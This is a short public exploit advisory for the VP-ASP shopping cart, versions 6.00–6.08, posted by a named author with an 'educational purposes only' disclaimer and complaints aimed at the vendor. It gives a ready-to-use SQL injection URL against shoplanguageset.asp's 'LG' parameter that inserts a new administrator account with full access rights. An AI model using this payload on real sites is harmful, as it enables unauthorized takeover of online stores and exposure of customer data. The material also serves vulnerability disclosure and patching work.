VP-ASP versions 6.00 through 6.08 suffer from a remote SQL injection vulnerability.
VP-ASP 6.00-6.08? SQL Injection / Exploit by tracewar(tracewar@gmail.com)
I'm not responsible for any illegal actions
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* this information is for educational purposes only!
* I didn't check this against the new 6.08 patch, but it's probably vulnerable too.
OK for the guys at vp-asp,
you should choose a different coding language for your shopping cart :(
I'm tired of writing vp-asp advisories 24/7 untill you guys release version 7.00
and take the security issue serious, I'm not going to audit your code anymore.
----- THE BUG:
the bug exists in the shoplanguageset.asp file under the "LG" query:
I didn't have a normal vp-asp shopping cart for testings but this hack should work:
add user a/a just like the old one:
/shoplanguageset.asp?LG=English';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--